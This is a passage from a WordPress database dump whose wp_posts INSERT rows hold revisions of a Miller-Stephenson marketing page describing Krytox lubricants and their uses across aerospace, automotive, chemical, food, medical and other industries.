conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:12:25', '2016-09-28 17:12:25', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2092, 2, '2016-09-28 17:14:14', '2016-09-28 17:14:14', '[button size="medium" style="primary" text="<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Automotive—Mechanical Systems</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Box Board Corrugating</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Chemical and Petrochemical</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Electronics/Semiconductor</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Food Processing</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Medical Industry Equipment Applications</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Metal Processing</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Oxygen and Reactive Gas Service</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Power Generation</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Pulp and Paper</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Textile</strong>" link="https://" target=""]\r\n\r\n[button size="medium" style="primary" text="<strong>Tire Mold</strong>" link="https://" target=""]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	